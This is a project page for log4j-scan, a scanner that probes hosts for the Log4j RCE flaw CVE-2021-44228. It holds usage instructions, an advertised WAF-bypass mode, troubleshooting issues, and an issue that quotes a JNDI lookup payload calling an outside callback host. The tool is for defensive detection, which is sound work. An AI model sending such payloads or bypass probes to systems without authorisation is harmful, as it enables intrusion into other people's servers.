A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228

log4j-scan

A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts

Features

  • Support for lists of URLs.
  • Fuzzing for more than 60 HTTP request headers (not only the 3-4 headers covered by previously seen tools).
  • Fuzzing for HTTP POST Data parameters.
  • Fuzzing for JSON data parameters.
  • Supports DNS callback for vulnerability discovery and validation.
  • WAF Bypass payloads.

Description

We have been researching the Log4J RCE (CVE-2021-44228) since it was released, and we have worked with our customers on preventing this vulnerability. We are open-sourcing a detection and scanning tool for discovering and fuzzing for the Log4J RCE vulnerability CVE-2021-44228. It is intended for security teams to scan their infrastructure for Log4J RCE, and also to test for WAF bypasses that can result in achieving code execution on the organization's environment.

It supports DNS OOB callbacks out of the box; there is no need to set up a DNS callback server.

Usage

$ python3 log4j-scan.py -h                                                   
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing] [--wait-time WAIT_TIME] [--waf-bypass]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Check a single URL.
  -l USEDLIST, --list USEDLIST
                        Check a list of URLs.
  --request-type REQUEST_TYPE
                        Request Type: (get, post) - [Default: get].
  --headers-file HEADERS_FILE
                        Headers fuzzing list - [default: headers.txt].
  --run-all-tests       Run all available tests on each URL.
  --exclude-user-agent-fuzzing
                        Exclude User-Agent header from fuzzing - useful to bypass weak checks on User-Agents.
  --wait-time WAIT_TIME
                        Wait time after all URLs are processed (in seconds) - [Default: 5].
  --waf-bypass          Extend scans with WAF bypass payloads.

Scan a Single URL

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local

Scan a Single URL using all Request Methods: GET, POST (url-encoded form), POST (JSON body)

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --run-all-tests

Discover WAF bypasses on the environment.

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --waf-bypass

Scan a list of URLs

$ python3 log4j-scan.py -l urls.txt

Installation

$ pip3 install -r requirements.txt

About FullHunt

FullHunt is the next-generation attack surface management platform. FullHunt enables companies to discover all of their attack surfaces, monitor them for exposure, and continuously scan them for the latest security vulnerabilities. All, in a single platform, and more.

FullHunt provides an enterprise platform for organizations. The FullHunt Enterprise Platform provides extended scanning and capabilities for customers. FullHunt Enterprise platform allows organizations to closely monitor their external attack surface, and get detailed alerts about every single change that happens. Organizations around the world use the FullHunt Enterprise Platform to solve their continuous security and external attack surface security challenges.

Legal Disclaimer

This project is made for educational and ethical testing purposes only. Usage of log4j-scan for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

License

The project is licensed under MIT License.

Author

Mazin Ahmed

Comments
  • Error when trying to scan hosts

    Greetings,

    I'm receiving this output when I try to scan a specific host with log4j. This is the command that I used.

    python3 log4j-scan.py -u http://ip-address

    My python version: Python 3.8.10

    I also installed the requirements

    The error output:

    [•] CVE-2021-44228 - Apache Log4j RCE Scanner
    [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
    [•] Secure your External Attack Surface with FullHunt.io.
    [•] Initiating DNS callback server (interact.sh).
    Traceback (most recent call last):
      File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 662, in urlopen
        self._prepare_proxy(conn)
      File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 950, in _prepare_proxy
        conn.connect()
      File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 322, in connect
        self._tunnel()
      File "/usr/lib/python3.8/http/client.py", line 901, in _tunnel
        raise OSError("Tunnel connection failed: %d %s" % (code,
    OSError: Tunnel connection failed: 403 Forbidden

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
      File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in send
        resp = conn.urlopen(
      File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 719, in urlopen
        retries = retries.increment(
      File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 436, in increment
        raise MaxRetryError(_pool, url, error or ResponseError(cause))
    urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register (Caused by ProxyError('Cannot connect to proxy.', OSError('Tunnel connection failed: 403 Forbidden')))

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
      File "log4j-scan.py", line 386, in <module>
        main()
      File "log4j-scan.py", line 356, in main
        dns_callback = Interactsh()
      File "log4j-scan.py", line 215, in __init__
        self.register()
      File "log4j-scan.py", line 223, in register
        res = self.session.post(
      File "/usr/lib/python3/dist-packages/requests/sessions.py", line 581, in post
        return self.request('POST', url, data=data, json=json, **kwargs)
      File "/usr/lib/python3/dist-packages/requests/sessions.py", line 533, in request
        resp = self.send(prep, **send_kwargs)
      File "/usr/lib/python3/dist-packages/requests/sessions.py", line 646, in send
        r = adapter.send(request, **kwargs)
      File "/usr/lib/python3/dist-packages/requests/adapters.py", line 510, in send
        raise ProxyError(e, request=request)
    requests.exceptions.ProxyError: HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register (Caused by ProxyError('Cannot connect to proxy.', OSError('Tunnel connection failed: 403 Forbidden')))

    opened by alessandronva 11
  • EXCEPTION: HTTPConnectionPool(host='PROXY', port=8080): Read timed out. (read timeout=4)

    [•] CVE-2021-44228 - Apache Log4j RCE Scanner
    [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
    [•] Secure your External Attack Surface with FullHunt.io.
    [•] Initiating DNS callback server (interact.sh).
    [%] Checking for Log4j RCE CVE-2021-44228.
    [•] URL: http://URLTOBESCANNED
    [•] URL: http://URLTOBESCANNED | PAYLOAD: ${jndi:ldap://[snip].interact.sh/chef93i}
    EXCEPTION: HTTPConnectionPool(host='PROXY', port=8080): Read timed out. (read timeout=4)
    [•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
    [•] Waiting...
    [•] Targets does not seem to be vulnerable.

    I try to scan and get the message in the title. It says the proxy does not respond. Then it goes on to say that it scanned. So did the scan work or did it fail?

    opened by mansam-ger 10
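
One way to decide whether a "not vulnerable" result like the one in the issue above can be trusted, and to catch runs like the first issue's that stop with a traceback before any payload is sent. This is an added example, not part of log4j-scan or of the original issues: the marker strings come from the output quoted on this page, while the `triage` function, its status names and the abridged sample runs are assumptions made for illustration.

```python
import re

# Marker strings copied from the scanner output quoted on this page.
NEGATIVE_VERDICT = "Targets does not seem to be vulnerable"
PAYLOADS_SENT = "Payloads sent to all URLs"
TRACEBACK = "Traceback (most recent call last):"
ATTEMPT_RE = re.compile(r"^\[.\]\s*URL:\s*(?P<url>\S+)\s*\|\s*PAYLOAD:\s*(?P<payload>.+)$")
EXCEPTION_RE = re.compile(r"^EXCEPTION:\s*(?P<msg>.+)$")


def triage(output):
    """Classify one scanner run from its console output (hypothetical helper).

    status is one of:
      aborted       the run crashed before the "payloads sent" stage
      inconclusive  "not vulnerable" was printed, but a request raised an
                    exception (or none was attempted), so delivery is unconfirmed
      negative      "not vulnerable" was printed and every request completed
      unknown       no recognised verdict line; this also covers positive
                    results, whose wording is not shown on this page
    """
    targets = {}
    last = None  # stats of the most recent attempt, still awaiting its outcome
    saw_traceback = saw_sent = saw_negative = False

    for raw in output.splitlines():
        line = raw.strip()
        attempt = ATTEMPT_RE.match(line)
        if attempt:
            last = targets.setdefault(
                attempt["url"], {"attempts": 0, "failed": 0, "errors": []})
            last["attempts"] += 1
            continue
        error = EXCEPTION_RE.match(line)
        if error:
            # Charge the exception to the attempt that immediately preceded it.
            if last is not None:
                last["failed"] += 1
                last["errors"].append(error["msg"])
                last = None
            continue
        if line.startswith(TRACEBACK):
            saw_traceback = True
        elif PAYLOADS_SENT in line:
            saw_sent = True
        elif NEGATIVE_VERDICT in line:
            saw_negative = True

    attempts = sum(t["attempts"] for t in targets.values())
    failed = sum(t["failed"] for t in targets.values())
    if saw_traceback and not saw_sent:
        status = "aborted"
    elif saw_negative and (failed or attempts == 0):
        status = "inconclusive"
    elif saw_negative:
        status = "negative"
    else:
        status = "unknown"
    return {"status": status, "targets": targets}


# Output from the issue above, with its line breaks restored.
PROXY_TIMEOUT_RUN = """\
[•] Initiating DNS callback server (interact.sh).
[%] Checking for Log4j RCE CVE-2021-44228.
[•] URL: http://URLTOBESCANNED
[•] URL: http://URLTOBESCANNED | PAYLOAD: ${jndi:ldap://[snip].interact.sh/chef93i}
EXCEPTION: HTTPConnectionPool(host='PROXY', port=8080): Read timed out. (read timeout=4)
[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
[•] Waiting...
[•] Targets does not seem to be vulnerable.
"""

# Constructed abridgement of the first issue's output (middle frames omitted).
ABORTED_RUN = """\
[•] Initiating DNS callback server (interact.sh).
Traceback (most recent call last):
  File "log4j-scan.py", line 356, in main
    dns_callback = Interactsh()
requests.exceptions.ProxyError: HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register
"""

# Constructed sample: every request completed (app.example.test is a placeholder).
CLEAN_RUN = """\
[•] URL: http://app.example.test | PAYLOAD: ${jndi:ldap://[snip].interact.sh/chef93i}
[•] URL: http://app.example.test | PAYLOAD: ${jndi:ldap://[snip].interact.sh/chef93i}
[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
[•] Targets does not seem to be vulnerable.
"""

if __name__ == "__main__":
    for name, run in [("proxy timeout", PROXY_TIMEOUT_RUN),
                      ("aborted", ABORTED_RUN), ("clean", CLEAN_RUN)]:
        print(f"{name}: {triage(run)['status']}")
```

An "inconclusive" or "aborted" result means the target was not actually tested and should be rescanned once the proxy or callback connectivity problem is resolved.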
  • Dockerfile - error while/after Initiating DNS callback server (interact.sh)

    Hi!

    I'm using the Dockerfile - as it is - from this repo.

    I tried the start parameter "-h" first: WORKS. After that, for testing, I tried the start parameter "-u https://google.de" (or any other URL).

    Now my output looks like this:

    [•] CVE-2021-44228 - Apache Log4j RCE Scanner
    [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
    [•] Secure your External Attack Surface with FullHunt.io.
    [•] Initiating DNS callback server (interact.sh).
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 699, in urlopen
        httplib_response = self._make_request(
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 382, in _make_request
        self._validate_conn(conn)
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 1010, in _validate_conn
        conn.connect()
      File "/usr/local/lib/python3.10/site-packages/urllib3/connection.py", line 416, in connect
        self.sock = ssl_wrap_socket(
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/ssl_.py", line 449, in ssl_wrap_socket
        ssl_sock = _ssl_wrap_socket_impl(
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/ssl_.py", line 493, in _ssl_wrap_socket_impl
        return ssl_context.wrap_socket(sock, server_hostname=server_hostname)
      File "/usr/local/lib/python3.10/ssl.py", line 512, in wrap_socket
        return self.sslsocket_class._create(
      File "/usr/local/lib/python3.10/ssl.py", line 1070, in _create
        self.do_handshake()
      File "/usr/local/lib/python3.10/ssl.py", line 1341, in do_handshake
        self._sslobj.do_handshake()
    ConnectionResetError: [Errno 104] Connection reset by peer

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/site-packages/requests/adapters.py", line 439, in send
        resp = conn.urlopen(
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 755, in urlopen
        retries = retries.increment(
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/retry.py", line 532, in increment
        raise six.reraise(type(error), error, _stacktrace)
      File "/usr/local/lib/python3.10/site-packages/urllib3/packages/six.py", line 769, in reraise
        raise value.with_traceback(tb)
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 699, in urlopen
        httplib_response = self._make_request(
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 382, in _make_request
        self._validate_conn(conn)
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 1010, in _validate_conn
        conn.connect()
      File "/usr/local/lib/python3.10/site-packages/urllib3/connection.py", line 416, in connect
        self.sock = ssl_wrap_socket(
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/ssl_.py", line 449, in ssl_wrap_socket
        ssl_sock = _ssl_wrap_socket_impl(
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/ssl_.py", line 493, in _ssl_wrap_socket_impl
        return ssl_context.wrap_socket(sock, server_hostname=server_hostname)
      File "/usr/local/lib/python3.10/ssl.py", line 512, in wrap_socket
        return self.sslsocket_class._create(
      File "/usr/local/lib/python3.10/ssl.py", line 1070, in _create
        self.do_handshake()
      File "/usr/local/lib/python3.10/ssl.py", line 1341, in do_handshake
        self._sslobj.do_handshake()
    urllib3.exceptions.ProtocolError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
      File "/app/log4j-scan.py", line 349, in <module>
        main()
      File "/app/log4j-scan.py", line 319, in main
        dns_callback = Interactsh()
      File "/app/log4j-scan.py", line 185, in __init__
        self.register()
      File "/app/log4j-scan.py", line 193, in register
        res = self.session.post(
      File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 590, in post
        return self.request('POST', url, data=data, json=json, **kwargs)
      File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 542, in request
        resp = self.send(prep, **send_kwargs)
      File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 655, in send
        r = adapter.send(request, **kwargs)
      File "/usr/local/lib/python3.10/site-packages/requests/adapters.py", line 498, in send
        raise ConnectionError(err, request=request)
    requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))
    
    opened by NopeNix 7
  • Error DNS callback server

    [•] Initiating DNS callback server (interact.sh).
    Traceback (most recent call last):
      File "/home/kali/log4j-scan/log4j-scan.py", line 335, in <module>
        main()
      File "/home/kali/log4j-scan/log4j-scan.py", line 305, in main
        dns_callback = Interactsh()
      File "/home/kali/log4j-scan/log4j-scan.py", line 156, in __init__
        rsa = RSA.generate(2048)
      File "/usr/local/lib/python3.9/dist-packages/Crypto/PublicKey/RSA.py", line 508, in generate
        obj = _RSA.generate_py(bits, rf, progress_func, e) # TODO: Don't use legacy _RSA module
      File "/usr/local/lib/python3.9/dist-packages/Crypto/PublicKey/_RSA.py", line 50, in generate_py
        p = pubkey.getStrongPrime(bits>>1, obj.e, 1e-12, randfunc)
      File "/usr/local/lib/python3.9/dist-packages/Crypto/Util/number.py", line 264, in getStrongPrime
        return _fastmath.getStrongPrime(int(N), int(e), false_positive_prob,
      File "/usr/local/lib/python3.9/dist-packages/Crypto/Random/_UserFriendlyRNG.py", line 202, in read
        return self._singleton.read(bytes)
      File "/usr/local/lib/python3.9/dist-packages/Crypto/Random/_UserFriendlyRNG.py", line 202, in read
        return self._singleton.read(bytes)
      File "/usr/local/lib/python3.9/dist-packages/Crypto/Random/_UserFriendlyRNG.py", line 202, in read
        return self._singleton.read(bytes)
      File "/usr/local/lib/python3.9/dist-packages/Crypto/Random/_UserFriendlyRNG.py", line 178, in read
        return _UserFriendlyRNG.read(self, bytes)
      File "/usr/local/lib/python3.9/dist-packages/Crypto/Random/_UserFriendlyRNG.py", line 129, in read
        self._ec.collect()
      File "/usr/local/lib/python3.9/dist-packages/Crypto/Random/_UserFriendlyRNG.py", line 77, in collect
        t = time.clock()
    AttributeError: module 'time' has no attribute 'clock'

    opened by jagadeeshjs8895 7
  • Error initializing DNS callback server

    [•] Initiating DNS callback server.
    Traceback (most recent call last):
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connection.py", line 174, in _new_conn
        conn = connection.create_connection(
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/util/connection.py", line 96, in create_connection
        raise err
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/util/connection.py", line 86, in create_connection
        sock.connect(sa)
    socket.timeout: timed out
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connectionpool.py", line 699, in urlopen
        httplib_response = self._make_request(
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connectionpool.py", line 394, in _make_request
        conn.request(method, url, **httplib_request_kw)
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connection.py", line 239, in request
        super(HTTPConnection, self).request(method, url, body=body, headers=headers)
      File "/usr/lib/python3.9/http/client.py", line 1285, in request
        self._send_request(method, url, body, headers, encode_chunked)
      File "/usr/lib/python3.9/http/client.py", line 1331, in _send_request
        self.endheaders(body, encode_chunked=encode_chunked)
      File "/usr/lib/python3.9/http/client.py", line 1280, in endheaders
        self._send_output(message_body, encode_chunked=encode_chunked)
      File "/usr/lib/python3.9/http/client.py", line 1040, in _send_output
        self.send(msg)
      File "/usr/lib/python3.9/http/client.py", line 980, in send
        self.connect()
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connection.py", line 205, in connect
        conn = self._new_conn()
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connection.py", line 179, in _new_conn
        raise ConnectTimeoutError(
    urllib3.exceptions.ConnectTimeoutError: (<urllib3.connection.HTTPConnection object at 0x7fce69752850>, 'Connection to www.dnslog.cn timed out. (connect timeout=30)')
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/home/kali/.local/lib/python3.9/site-packages/requests/adapters.py", line 439, in send
        resp = conn.urlopen(
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connectionpool.py", line 755, in urlopen
        retries = retries.increment(
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/util/retry.py", line 574, in increment
        raise MaxRetryError(_pool, url, error or ResponseError(cause))
    urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='www.dnslog.cn', port=80): Max retries exceeded with url: /getdomain.php (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7fce69752850>, 'Connection to www.dnslog.cn timed out. (connect timeout=30)'))
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/home/kali/software/log4j-scan/log4j-scan.py", line 238, in <module>
        main()
      File "/home/kali/software/log4j-scan/log4j-scan.py", line 217, in main
        dns_callback = Dnslog()
      File "/home/kali/software/log4j-scan/log4j-scan.py", line 127, in __init__
        req = self.s.get("http://www.dnslog.cn/getdomain.php", timeout=30)
      File "/home/kali/.local/lib/python3.9/site-packages/requests/sessions.py", line 555, in get
        return self.request('GET', url, **kwargs)
      File "/home/kali/.local/lib/python3.9/site-packages/requests/sessions.py", line 542, in request
        resp = self.send(prep, **send_kwargs)
      File "/home/kali/.local/lib/python3.9/site-packages/requests/sessions.py", line 655, in send
        r = adapter.send(request, **kwargs)
      File "/home/kali/.local/lib/python3.9/site-packages/requests/adapters.py", line 504, in send
        raise ConnectTimeout(e, request=request)
    requests.exceptions.ConnectTimeout: HTTPConnectionPool(host='www.dnslog.cn', port=80): Max retries exceeded with url: /getdomain.php (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7fce69752850>, 'Connection to www.dnslog.cn timed out. (connect timeout=30)'))
    
    
    opened by pdelteil 7
  • [EXCEPTIONS] ConnectionError

    Hello, I'm facing this issue. Can anybody help me with this?

    requests.exceptions.ConnectionError: HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register (Caused by NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x7faa56dd0c18>: Failed to establish a new connection: [Errno 111] Connection refused',))

    opened by sokobban 6
  • [•] Initiating DNS callback server (interact.sh). Error

    I've tried running the script and docker container today and I've been getting:

    [•] CVE-2021-44228 - Apache Log4j RCE Scanner
    [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
    [•] Secure your External Attack Surface with FullHunt.io.
    [•] Initiating DNS callback server (interact.sh).
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/site-packages/urllib3/connection.py", line 174, in _new_conn
        conn = connection.create_connection(
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/connection.py", line 96, in create_connection
        raise err
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/connection.py", line 86, in create_connection
        sock.connect(sa)
    TimeoutError: timed out
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 699, in urlopen
        httplib_response = self._make_request(
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 382, in _make_request
        self._validate_conn(conn)
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 1010, in _validate_conn
        conn.connect()
      File "/usr/local/lib/python3.10/site-packages/urllib3/connection.py", line 358, in connect
        conn = self._new_conn()
      File "/usr/local/lib/python3.10/site-packages/urllib3/connection.py", line 179, in _new_conn
        raise ConnectTimeoutError(
    urllib3.exceptions.ConnectTimeoutError: (<urllib3.connection.HTTPSConnection object at 0x7f01f4b6f700>, 'Connection to interact.sh timed out. (connect timeout=30)')
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/site-packages/requests/adapters.py", line 439, in send
        resp = conn.urlopen(
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 755, in urlopen
        retries = retries.increment(
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/retry.py", line 574, in increment
        raise MaxRetryError(_pool, url, error or ResponseError(cause))
    urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x7f01f4b6f700>, 'Connection to interact.sh timed out. (connect timeout=30)'))
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/app/log4j-scan.py", line 412, in <module>
        main()
      File "/app/log4j-scan.py", line 382, in main
        dns_callback = Interactsh()
      File "/app/log4j-scan.py", line 239, in __init__
        self.register()
      File "/app/log4j-scan.py", line 247, in register
        res = self.session.post(
      File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 590, in post
        return self.request('POST', url, data=data, json=json, **kwargs)
      File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 542, in request
        resp = self.send(prep, **send_kwargs)
      File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 655, in send
        r = adapter.send(request, **kwargs)
      File "/usr/local/lib/python3.10/site-packages/requests/adapters.py", line 504, in send
        raise ConnectTimeout(e, request=request)
    requests.exceptions.ConnectTimeout: HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x7f01f4b6f700>, 'Connection to interact.sh timed out. (connect timeout=30)'))
    
    

    Is there something I'm doing wrong?

    Thank you, Pete

    opened by mirtec001 5
  • DNS callback error: "Connection reset by peer"

    Hi, I cannot get this to work, and I don't see my issue posted. Any help would be appreciated, thank you.

    [•] CVE-2021-44228 - Apache Log4j RCE Scanner
    [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
    [•] Secure your External Attack Surface with FullHunt.io.
    [•] Initiating DNS callback server (interact.sh).
    Traceback (most recent call last):
      File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 600, in urlopen
        chunked=chunked)
      File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 343, in _make_request
        self._validate_conn(conn)
      File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 839, in _validate_conn
        conn.connect()
      File "/usr/lib/python3.6/site-packages/urllib3/connection.py", line 358, in connect
        ssl_context=context)
      File "/usr/lib/python3.6/site-packages/urllib3/util/ssl_.py", line 354, in ssl_wrap_socket
        return context.wrap_socket(sock, server_hostname=server_hostname)
      File "/usr/lib64/python3.6/ssl.py", line 365, in wrap_socket
        _context=self, _session=session)
      File "/usr/lib64/python3.6/ssl.py", line 776, in __init__
        self.do_handshake()
      File "/usr/lib64/python3.6/ssl.py", line 1036, in do_handshake
        self._sslobj.do_handshake()
      File "/usr/lib64/python3.6/ssl.py", line 648, in do_handshake
        self._sslobj.do_handshake()
    ConnectionResetError: [Errno 104] Connection reset by peer

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
      File "/usr/lib/python3.6/site-packages/requests/adapters.py", line 449, in send
        timeout=timeout
      File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 638, in urlopen
        _stacktrace=sys.exc_info()[2])
      File "/usr/lib/python3.6/site-packages/urllib3/util/retry.py", line 368, in increment
        raise six.reraise(type(error), error, _stacktrace)
      File "/usr/lib/python3.6/site-packages/urllib3/packages/six.py", line 692, in reraise
        raise value.with_traceback(tb)
      File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 600, in urlopen
        chunked=chunked)
      File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 343, in _make_request
        self._validate_conn(conn)
      File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 839, in _validate_conn
        conn.connect()
      File "/usr/lib/python3.6/site-packages/urllib3/connection.py", line 358, in connect
        ssl_context=context)
      File "/usr/lib/python3.6/site-packages/urllib3/util/ssl_.py", line 354, in ssl_wrap_socket
        return context.wrap_socket(sock, server_hostname=server_hostname)
      File "/usr/lib64/python3.6/ssl.py", line 365, in wrap_socket
        _context=self, _session=session)
      File "/usr/lib64/python3.6/ssl.py", line 776, in __init__
        self.do_handshake()
      File "/usr/lib64/python3.6/ssl.py", line 1036, in do_handshake
        self._sslobj.do_handshake()
      File "/usr/lib64/python3.6/ssl.py", line 648, in do_handshake
        self._sslobj.do_handshake()
    urllib3.exceptions.ProtocolError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
      File "log4j-scan.py", line 365, in <module>
        main()
      File "log4j-scan.py", line 335, in main
        dns_callback = Interactsh()
      File "log4j-scan.py", line 195, in __init__
        self.register()
      File "log4j-scan.py", line 204, in register
        f"https://{self.server}/register", headers=self.headers, json=data, timeout=30)
      File "/usr/lib/python3.6/site-packages/requests/sessions.py", line 581, in post
        return self.request('POST', url, data=data, json=json, **kwargs)
      File "/usr/lib/python3.6/site-packages/requests/sessions.py", line 533, in request
        resp = self.send(prep, **send_kwargs)
      File "/usr/lib/python3.6/site-packages/requests/sessions.py", line 646, in send
        r = adapter.send(request, **kwargs)
      File "/usr/lib/python3.6/site-packages/requests/adapters.py", line 498, in send
        raise ConnectionError(err, request=request)
    requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    opened by lgaalswyk 5
  • Crypto.Cipher import AES, PKCS1_OAEP

      File "/home/parallels/Log4j-RCE-Scanner/log4j-scan/log4j-scan.py", line 22, in <module>
        from Crypto.Cipher import AES, PKCS1_OAEP
    ModuleNotFoundError: No module named 'Crypto'

    opened by ehsan235 5
  • AttributeError: module 'time' has no attribute 'clock' when running with Python 3.9.9

    I'm getting this stack trace when launching with

    > python3 --version
    Python 3.9.9
    > uname -v 
    Darwin Kernel Version 19.6.0: Tue Jun 22 19:49:55 PDT 2021; root:xnu-6153.141.35~1/RELEASE_X86_64
    
    > python3 log4j-scan.py -u https://myservice.com --run-all-tests
    [•] CVE-2021-44228 - Apache Log4j RCE Scanner
    [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
    [•] Secure your External Attack Surface with FullHunt.io.
    [•] Initiating DNS callback server (interact.sh).
    Traceback (most recent call last):
      File "/Users/rochec/Documents/Temp/log4j-scan/log4j-scan.py", line 336, in <module>
        main()
      File "/Users/rochec/Documents/Temp/log4j-scan/log4j-scan.py", line 306, in main
        dns_callback = Interactsh()
      File "/Users/rochec/Documents/Temp/log4j-scan/log4j-scan.py", line 156, in __init__
        rsa = RSA.generate(2048)
      File "/usr/local/lib/python3.9/site-packages/Crypto/PublicKey/RSA.py", line 508, in generate
        obj = _RSA.generate_py(bits, rf, progress_func, e)    # TODO: Don't use legacy _RSA module
      File "/usr/local/lib/python3.9/site-packages/Crypto/PublicKey/_RSA.py", line 50, in generate_py
        p = pubkey.getStrongPrime(bits>>1, obj.e, 1e-12, randfunc)
      File "/usr/local/lib/python3.9/site-packages/Crypto/Util/number.py", line 264, in getStrongPrime
        return _fastmath.getStrongPrime(int(N), int(e), false_positive_prob,
      File "/usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py", line 202, in read
        return self._singleton.read(bytes)
      File "/usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py", line 202, in read
        return self._singleton.read(bytes)
      File "/usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py", line 202, in read
        return self._singleton.read(bytes)
      File "/usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py", line 178, in read
        return _UserFriendlyRNG.read(self, bytes)
      File "/usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py", line 129, in read
        self._ec.collect()
      File "/usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py", line 77, in collect
        t = time.clock()
    AttributeError: module 'time' has no attribute 'clock'
    

    Seems to be due to this:

    The function time.clock() has been removed, after having been deprecated since Python 3.3: use time.perf_counter() or time.process_time() instead, depending on your requirements, to have well-defined behavior.
    
    opened by chroche 5
  • Error on a first run

